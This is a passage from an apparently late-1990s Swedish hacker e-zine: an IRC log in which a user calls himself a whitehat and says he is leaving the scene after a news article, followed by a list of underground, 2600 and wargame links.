<Gotrex> ingen har fått fängelse för dator relaterade brott..[lite
|
||
fel formulerat så här i efterhand]
|
||
<Gotrex> ännu..
|
||
<pewp> jag har inte hackat en sida, jag har kollat över säkerheten
|
||
och sedan mailat sysadm
|
||
<pewp> det är så jag jobbar
|
||
<pewp> jag är en hacker, ingen cracker, script kiddie, wannabe,
|
||
newbie
|
||
<pewp> jag har hållt på med hacking i över 7 år
|
||
<pewp> jag har inte hackat en sida nåfonsin
|
||
<pewp> jag är en whitehat
|
||
<Gotrex> då så.. varför dra..
|
||
<pewp> vill inte att folk ska spoinera på mig
|
||
<pewp> jag kanske kommer tillbaka med ett annat namn
|
||
<pewp> men pewp e borta
|
||
<Gotrex> mm
|
||
<Gotrex> yförsig
|
||
<pewp> kommer byta ISP, inte snacka med mina polare på IRC mer
|
||
<Gotrex> får jag publicera det här?
|
||
<pewp> jag e paraniod, TRUST NO ONE
|
||
<pewp> jag vill inte ha folk som snokar i mitt liv
|
||
<pewp> varför ska du publisera detta
|
||
<pewp> vad ska det göra för nytta ?
|
||
<Gotrex> undra vaför just ni 16 pers. var med där?
|
||
<pewp> om du har en vettig anledning så kanske jag går med på det
|
||
<Gotrex> pewps reaktions på artikeln :P
|
||
<Gotrex> det här samtalet säger allt..typ [mycket iaf]
|
||
<Gotrex> dom har väl förmodligen kollat upp lite folks isp och fått
|
||
namnet där ifrån
|
||
<pewp> Du, jag har varit med i scenen så länge så jag blev inte
|
||
förvånad, jag hänger med världens största hacker grupper, jag har
|
||
gjort så mycket i den svenska hacking scenen, inte som pewp utan
|
||
som ett annat namn, jag sitter med i sveriges elite på andra nät
|
||
än dalnet...
|
||
<pewp> det förvånar inte mig...
|
||
<Gotrex> vilka?
|
||
<Gotrex> yförsig alla har ganska 'tunga' bakgrunder..
|
||
<pewp> LoU, VMM, synnergy, och en massa andra. Men jag skiter i vad
|
||
dom gör, det är bara mina kompisar, jag är en white hat
|
||
<pewp> jag var inte äns där
|
||
<pewp> men jag har varit med i så mycket annat så det förvånar inte
|
||
mig...
|
||
<Gotrex> var du inte ens där? strange .. (jag var inte där hellerbtw)
|
||
<pewp> DU kan juh hälsa att att oldskool pewp har försvunnit pga
|
||
denna trams grejjen.
|
||
<Gotrex> publicerar den här loggen.. de som läser den får veta..
|
||
<pewp> ok lugnt, jag drar nu
|
||
<pewp> hejdå ha ett bra liv
|
||
<pewp> vi kanske syns ngn gång...
|
||
<Gotrex> tack det samma [hej då? :P]
|
||
|
||
*[ kommentarer vid redigering ]
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ /
|
||
/ "Det finns inga problem, bara lösningar." \
|
||
\ - diox @#phreakerz :P /
|
||
/ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| Länkar Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
http://www.rttcrew.com/ Reclaim The Telephones
|
||
http.//www.wallarea.com/ Svenska underground nyheter
|
||
http://www.2600se.com Svenska 2600
|
||
http://www.insecurefoundation.cjb.net Svensk H/P
|
||
http://www.teliasuger.com Streetwhore
|
||
http://www.2600hz.net/ Heretics Inc
|
||
http://www.avlyssning.nu/
|
||
http://www.splitsecond.nu/
|
||
members.xoom.com/_XMCM/msadf/zines/ GSS zines sektion
|
||
|
||
http://user.tninet.se/~dcy752g/ Artikel om 2600 mötet
|
||
|
||
http://scene.textfiles.com/ Internationella Ezines
|
||
http://www.2600.com En klassiker
|
||
http://forbidden.net-security.org/
|
||
http://www.hack.co.za/
|
||
http://www.pots.gr
|
||
|
||
http://207.253.202.66 NTWAk0s wargame (NT)
|
||
http://213.112.7.132 Dumones wargame (Unix)
|
||
http://www.hackerslab.org
|
||
http://www.hacksdmi.org/
|
||
|
||
http://www.fastpris.cjb.net Protestera mot spray
|
||
http://hem.fyristorg.com/ecco/ Kul!
|
||
|
||
___,,,^..^,,,___
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ Nu finns vi på: /
|
||
\ http://www.GothenburgSecretService.net \
|
||
\ (http://members.xoom.com/_XMCM/msadf/) /
|
||
/ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\THE\END\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|